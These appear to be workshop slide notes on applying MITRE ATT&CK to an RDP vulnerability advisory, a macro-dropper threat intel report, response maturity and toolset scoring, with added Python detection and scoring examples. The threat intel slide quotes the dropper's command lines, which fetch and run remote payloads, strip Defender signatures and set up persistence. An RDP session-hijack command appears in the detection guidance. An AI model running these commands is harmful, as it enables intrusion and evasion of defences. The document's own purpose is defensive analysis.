  • A remote code execution vulnerability exists in Online Surrogate Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target surrogate, which can lead to complete takeover of the surrogate.
  • To exploit this vulnerability, an attacker would need to send a specially crafted request to the target surrogate’s Online Surrogate Service via RDP.
  • The update addresses the vulnerability by correcting how Online Surrogate Services handles connection requests.
  • You’ve checked – you have an old version of the software and you can’t patch right now due to some other dependencies that need to be sorted out first
  Exploitability summary: Publicly Disclosed: Yes | Proof of Concept: Yes | Exploited: Yes | Latest Software Release: 4 – Not affected | Older Software Release: 1 – Exploitation More Likely | Denial of Service: No
• 17. T1076: Remote Desktop Protocol (https://attack.mitre.org/techniques/T1076/ – Groups using it: 16, Software using it: 8)
  Mitigation
  • Disable the RDP service if it is unnecessary
  • Remove unnecessary accounts and groups from the Remote Desktop Users group
  • Enable firewall rules to block RDP traffic between network security zones
  • Audit the Remote Desktop Users group membership regularly
  • Remove the local Administrators group from the list of groups allowed to log in through RDP
  • Limit remote user permissions if remote access is necessary
  • Use remote desktop gateways and multifactor authentication for remote logins
  • Do not leave RDP accessible from the internet
  • Change GPOs to define shorter session timeouts and the maximum amount of time any single session can be active
  • Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server
  Detection
  • Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.
  • Monitor for user accounts logged into systems they would not normally access, or access patterns to multiple systems over a relatively short period of time.
  • Set up process monitoring for tscon.exe usage and monitor service creation that uses cmd.exe /k or cmd.exe /c in its arguments to prevent RDP session hijacking (e.g. sc create sesshijack binpath= “cmd.exe /k tscon 4 /dest:console” and then: net start sesshijack)
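The two detections listed for T1076 on slide 17 (service creation that runs cmd.exe /k or /c with tscon, and tscon.exe process starts), written as detection logic over sample events. This is an added example, not code from the deck or from MITRE; the five log lines and their key=value layout are constructed for it, and the EventID values follow the Windows System (7045, service installed) and Security (4688, process creation) logs.

```python
"""Detection logic for the T1076 guidance: flag service creation whose
binary path runs cmd.exe /k or cmd.exe /c together with tscon, and flag
tscon.exe process starts. Added example; log lines are constructed."""
import re
from dataclasses import dataclass

# Constructed sample events (not real logs). EventID 7045 = service installed
# (System log), EventID 4688 = process creation (Security log).
SAMPLE_EVENTS = [
    r'EventID=7045 Host=WS01 ServiceName=sesshijack ImagePath="cmd.exe /k tscon 4 /dest:console" User=SYSTEM',
    r'EventID=7045 Host=WS01 ServiceName=BackupAgent ImagePath="C:\Program Files\Backup\agent.exe" User=SYSTEM',
    r'EventID=4688 Host=WS02 NewProcessName=C:\Windows\System32\tscon.exe CommandLine="tscon 2 /dest:console" User=WS02\admin',
    r'EventID=4688 Host=WS02 NewProcessName=C:\Windows\System32\notepad.exe CommandLine="notepad.exe" User=WS02\alice',
    r'EventID=7045 Host=WS03 ServiceName=Updater ImagePath="cmd.exe /c C:\tools\update.bat" User=SYSTEM',
]

_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')   # key="quoted value" or key=value
_CMD_SHELL = re.compile(r'cmd\.exe\s+/[kc]\b', re.IGNORECASE)
_TSCON = re.compile(r'\btscon(?:\.exe)?\b', re.IGNORECASE)


@dataclass
class Finding:
    host: str
    severity: str
    rule: str
    evidence: str


def parse_event(line: str) -> dict:
    """Parse one key=value line into a dict; quoted values may contain spaces."""
    return {key: (quoted if unquoted == "" else unquoted)
            for key, quoted, unquoted in _KV.findall(line)}


def detect(lines) -> list:
    """Apply the T1076 detections to each event and return the findings in log order."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        host = ev.get("Host", "?")
        if ev.get("EventID") == "7045":
            path = ev.get("ImagePath", "")
            if _CMD_SHELL.search(path) and _TSCON.search(path):
                findings.append(Finding(host, "high",
                    "service binary runs cmd.exe /k|/c with tscon (RDP session hijack)", path))
            elif _CMD_SHELL.search(path):
                findings.append(Finding(host, "medium",
                    "service binary runs cmd.exe /k or /c; review the service", path))
        elif ev.get("EventID") == "4688":
            proc = ev.get("NewProcessName", "")
            cmd = ev.get("CommandLine", "")
            if proc.lower().endswith("tscon.exe"):
                # /dest:console attaches the session to the console: the hijack itself.
                severity = "high" if "/dest:console" in cmd.lower() else "medium"
                findings.append(Finding(host, severity, "tscon.exe executed", cmd))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.host}: {f.rule} -> {f.evidence}")
```

The second rule (any service whose binary is cmd.exe /k or /c) is deliberately broader than the hijack signature, which is why it is only medium: it catches the same trick with a renamed or differently launched tscon, at the cost of legitimate wrapper services that must be baselined.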
• 18. Scenario 2: Threat Intel Report
  • Multi-Stage Backdoor Dropper Document Possibly Targeting Online Services Vendors Observed
  • 1st stage: the dropper document, after enabling VBA macros, executes mshta.exe with the following command line: mshta.exe http://www.tinyurl[.]com/shlsqd
  • The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped JavaScript (JS) that performs the following actions:
    1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe -removedefinitions -dynamicsignatures
    2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE
    3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe
    4. Disables unsafe files being opened in protected view by writing to one of the following registry paths: HKCU\Software\Microsoft\Office\[11-16].0\[Excel|Word|PowerPoint]\Security\ProtectedView\DisableUnsafeLocationsInPV
    5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m (window.close)
    6. Creates a registry run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate with the following command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F
• 19. Scenario 2: Threat Intel Report – the same report as on slide 18, annotated with the ATT&CK techniques it maps to:
  T1193: Spearphishing Attachment, T1089: Disabling Security Tools, T1170: Mshta, T1481: Web Service, T1053: Scheduled Task, T1027: Obfuscated Files or Information, T1064: Scripting, T1086: PowerShell, T1112: Modify Registry
• 21. Maturity
  0 = We do nothing
  1 = Locally logged – relevant data is captured on the endpoint
  2 = Centrally logged – data is gathered centrally
  3 = Correlated / enriched – logs for the event are enriched with data from other sources to increase fidelity
  4 = Alerting – we have rules to detect anomalies and suspicious events
  5 = Playbook exists – a process to respond exists (incl. analyse, contain, eradicate, recover)
  6 = Response is automated – we have an automated response for this alert
• 22. Maturity ladder: the same seven levels, shown from 6 = Response is automated down to 0 = We do nothing
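The 0 to 6 maturity scale of slides 21 and 22 turns into a readiness scorecard once a level is assigned to every shortlisted technique. The following is an added example, not code from the deck: it applies the scale to the techniques from the slide 19 mapping, with maturity values that are constructed for the example and a target level of 4 (Alerting) that is this example's choice.

```python
"""Readiness scorecard for the 0-6 maturity scale, applied per shortlisted
technique. Added example; the assessed levels below are constructed."""

MATURITY_LEVELS = {
    0: "We do nothing",
    1: "Locally logged",
    2: "Centrally logged",
    3: "Correlated / enriched",
    4: "Alerting",
    5: "Playbook exists",
    6: "Response is automated",
}

# Constructed assessment: technique -> maturity level reached today.
ASSESSMENT = {
    "T1193: Spearphishing Attachment": 5,
    "T1089: Disabling Security Tools": 2,
    "T1170: Mshta": 1,
    "T1481: Web Service": 0,
    "T1053: Scheduled Task": 4,
    "T1027: Obfuscated Files or Information": 2,
    "T1064: Scripting": 3,
    "T1086: PowerShell": 4,
    "T1112: Modify Registry": 2,
}


def validate(assessment: dict) -> None:
    """Reject an empty shortlist or levels that are not on the 0-6 scale."""
    if not assessment:
        raise ValueError("the shortlist is empty")
    for technique, level in assessment.items():
        if level not in MATURITY_LEVELS:
            raise ValueError(f"{technique}: level {level!r} is not on the 0-6 scale")


def readiness_report(assessment: dict, target: int = 4) -> dict:
    """Summarise where the shortlist stands against a target maturity level.

    Readiness is bounded by the weakest technique (the floor): one technique
    nobody logs is enough for an intrusion to go unnoticed."""
    validate(assessment)
    if target not in MATURITY_LEVELS:
        raise ValueError("target must be a level on the 0-6 scale")
    levels = list(assessment.values())
    floor = min(levels)
    reached = sum(1 for lvl in levels if lvl >= target)
    # Techniques below target, weakest first, each with the next level to build.
    gaps = [(technique, lvl, MATURITY_LEVELS[lvl + 1])
            for lvl, technique in sorted((lvl, t) for t, lvl in assessment.items())
            if lvl < target]
    return {
        "techniques": len(levels),
        "floor": floor,
        "floor_label": MATURITY_LEVELS[floor],
        "at_or_above_target": reached,
        "target_coverage_pct": round(100 * reached / len(levels)),
        "histogram": {lvl: levels.count(lvl) for lvl in MATURITY_LEVELS},
        "gaps": gaps,
    }


if __name__ == "__main__":
    report = readiness_report(ASSESSMENT)
    print(f"floor: {report['floor']} ({report['floor_label']}); "
          f"{report['at_or_above_target']}/{report['techniques']} techniques at target "
          f"({report['target_coverage_pct']}%)")
    for technique, level, next_step in report["gaps"]:
        print(f"  {technique}: level {level}, next build: {next_step}")
```

Reporting the floor next to the coverage percentage keeps the two honest with each other: a shortlist that is 33% at Alerting but has a technique at level 0 is a different conversation from one at 33% whose weakest entry is centrally logged.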
• 23. Scenario 3: It’s all about the money
  • There is an ongoing trade war between the two biggest economies in the world
  • Unfortunately this has an impact on the wealthiest people, who are Sense//Net Library’s customers
  • A few of them decided to put their AI constructs to sleep until better times come, hence your profits decrease
  • The management decided it’s time to cut costs and your department needs to participate
  • You don’t want to cut people – they are a great team – so you focus on vendor contracts that are going to be renewed this year – which security control can you afford to get rid of?
• 24. Measure effectiveness of the toolset (empty scoring matrix)
  Rows: the shortlisted MITRE ATT&CK techniques – T1193: Spearphishing Attachment, T1089: Disabling Security Tools, T1112: Modify Registry, T1086: PowerShell, T1053: Scheduled Task
  Columns: the current toolset, Tool1 … Tool8, grouped under four measures with their scoring scales:
  • Early warning (Reconnaissance): [2] Would Warn of Activity, [0] N/A
  • Inbound Protect (Weaponization, Delivery): [2] Would Block Activity, [1] Could Block Activity, [0] Would Not Block Activity
  • Detect (Weaponization, Delivery, C2): [2] Would Detect Activity, [0] No Detection or N/A
  • Outbound Protect (Exploit, Installation, C2, AOO): [2] Would Block Outbound Traffic, [1] Could Have Blocked, [0] Would Not Block Activity
  Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
  https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
• 25. Measure effectiveness of the toolset – current vs proposed toolset measure (scoring legend as on slide 24; a technique’s measure is the sum of its row)
  Technique                         Tool1  Tool2  Tool3  Tool4  Tool5  Tool6  Tool7  Tool8  | Current  Proposed
  T1193: Spearphishing Attachment     0      0      2      1      2      0      2      1    |    8        7
  T1089: Disabling Security Tools     2      0      0      2      2      0      2      1    |    9        8
  T1112: Modify Registry              0      0      2      1      2      0      2      1    |    8        7
  T1086: PowerShell                   2      0      0      2      2      0      2      1    |    9        8
  T1053: Scheduled Task               2      0      2      1      0      2      2      1    |   10        7
  Toolset measure (sum)                                                                     |   44       37
  Relative to current                                                                       |  100%      84%
  Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
  https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
• 26. Scenario 4: Let’s go shopping
  • Times are changing and the company’s profits picked up
  • You successfully argued for a bigger budget and now you can spend some money on a new security control
  • Your team shortlisted a few vendors and you’ve conducted a PoC
  • The results show there are a few differences between the products
  • The procurement team negotiated nearly identical prices for the products
• 27. Measure effectiveness of the toolset – current vs future toolset measure, previous compared to Proposed A and B (scoring legend as on slide 24, plus for the proposed tools: [2] Proposal Applicable, [0] N/A). The five current tool columns carry the values of Tool1, Tool3, Tool4, Tool5 and Tool7 from slide 25.
  Technique                         Tool1  Tool3  Tool4  Tool5  Tool7  | ToolA  ToolB  | Current  Proposed A  Proposed B
  T1193: Spearphishing Attachment     0      2      1      2      2    |   2      0    |    7         9           7
  T1089: Disabling Security Tools     2      0      2      2      2    |   0      2    |    8         8          10
  T1112: Modify Registry              0      2      1      2      2    |   2      0    |    7         9           7
  T1086: PowerShell                   2      0      2      2      2    |   0      0    |    8         8           8
  T1053: Scheduled Task               2      2      1      0      2    |   2      0    |    7         9           7
  Toolset measure (sum)                                                                |   37        43          39
  Relative to current                                                                  |  100%      116%        105%
  Previous toolset (slide 25) as baseline                                              |   44        43          39
  Relative to previous                                                                 |  100%       98%         89%
  Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
  https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
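The scoring used on slides 24 to 27 (per tool, per shortlisted technique, on the scale of the tool's measure category; row sums per technique; toolset total; candidate as a percentage of a baseline) as working code that reproduces the slide 25 and slide 27 totals. This is an added example, not code from the deck. Two assumptions are made: tools belong to the measure categories two per column group in slide order (Tool1 and Tool2 early warning, Tool3 and Tool4 inbound protect, Tool5 and Tool6 detect, Tool7 and Tool8 outbound protect), and the "Proposed" toolset on slide 25 is the current one minus Tool2, Tool6 and Tool8, the combination that reproduces the slide's per-technique numbers and leaves the five tools shown on slide 27.

```python
"""Toolset effectiveness scoring: each tool scores 0/1/2 against every
shortlisted technique on its category's scale, a technique's score is the
row sum, the toolset score is the sum over techniques, and a candidate is
reported as a percentage of a baseline. Added example; matrix values are
the ones on slides 25 and 27, category membership is an assumption."""

TECHNIQUES = ["T1193", "T1089", "T1112", "T1086", "T1053"]

# Allowed scores per measure category, from the legend on slide 24 and the
# "[2] Proposal Applicable / [0] N/A" scale on slide 27.
CATEGORY_SCALE = {
    "early_warning": {0, 2},
    "inbound_protect": {0, 1, 2},
    "detect": {0, 2},
    "outbound_protect": {0, 1, 2},
    "proposal": {0, 2},
}

TOOL_CATEGORY = {   # assumption: two tools per category, left to right
    "Tool1": "early_warning", "Tool2": "early_warning",
    "Tool3": "inbound_protect", "Tool4": "inbound_protect",
    "Tool5": "detect", "Tool6": "detect",
    "Tool7": "outbound_protect", "Tool8": "outbound_protect",
    "ToolA": "proposal", "ToolB": "proposal",
}

# Slide 25, one list per tool column, in TECHNIQUES order.
CURRENT = {
    "Tool1": [0, 2, 0, 2, 2], "Tool2": [0, 0, 0, 0, 0],
    "Tool3": [2, 0, 2, 0, 2], "Tool4": [1, 2, 1, 2, 1],
    "Tool5": [2, 2, 2, 2, 0], "Tool6": [0, 0, 0, 0, 2],
    "Tool7": [2, 2, 2, 2, 2], "Tool8": [1, 1, 1, 1, 1],
}
# Slide 27, the two candidate products.
TOOL_A = [2, 0, 2, 0, 2]
TOOL_B = [0, 2, 0, 0, 0]


def validate(matrix: dict) -> None:
    """Every tool needs one score per technique, on its category's scale."""
    for tool, scores in matrix.items():
        category = TOOL_CATEGORY[tool]
        if len(scores) != len(TECHNIQUES):
            raise ValueError(f"{tool}: expected {len(TECHNIQUES)} scores")
        bad = [s for s in scores if s not in CATEGORY_SCALE[category]]
        if bad:
            raise ValueError(f"{tool}: {bad} not allowed on the {category} scale")


def technique_scores(matrix: dict) -> dict:
    """Row sums: how well the whole toolset covers each technique."""
    validate(matrix)
    return {t: sum(scores[i] for scores in matrix.values())
            for i, t in enumerate(TECHNIQUES)}


def toolset_score(matrix: dict) -> int:
    return sum(technique_scores(matrix).values())


def relative_pct(candidate: dict, baseline: dict) -> int:
    """Candidate toolset score as a whole percentage of the baseline's."""
    return round(100 * toolset_score(candidate) / toolset_score(baseline))


def without(matrix: dict, *tools: str) -> dict:
    return {name: scores for name, scores in matrix.items() if name not in tools}


def with_tool(matrix: dict, name: str, scores: list) -> dict:
    return {**matrix, name: scores}


def regressions(before: dict, after: dict) -> dict:
    """Per-technique score drops that the total hides (negative deltas only)."""
    b, a = technique_scores(before), technique_scores(after)
    return {t: a[t] - b[t] for t in TECHNIQUES if a[t] < b[t]}


if __name__ == "__main__":
    proposed = without(CURRENT, "Tool2", "Tool6", "Tool8")        # scenario 3
    print("current", toolset_score(CURRENT), "proposed", toolset_score(proposed),
          f"({relative_pct(proposed, CURRENT)}%)", regressions(CURRENT, proposed))
    for name, scores in (("ToolA", TOOL_A), ("ToolB", TOOL_B)):   # scenario 4
        candidate = with_tool(proposed, name, scores)
        print(name, toolset_score(candidate),
              f"{relative_pct(candidate, proposed)}% of proposed,",
              f"{relative_pct(candidate, CURRENT)}% of the original toolset")
```

The `regressions` helper is the check worth keeping next to the totals: scenario 3 drops the toolset from 44 to 37, which reads as a uniform 16% loss, while per technique it is a loss of 1 point everywhere except T1053: Scheduled Task, which loses 3 because Tool6 was the only detect-category tool scoring it.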
• 29. Putting it all together
  • Vulnerability reports
  • Threat Intel reports
  • Toolset effectiveness
  • Response maturity
  • ...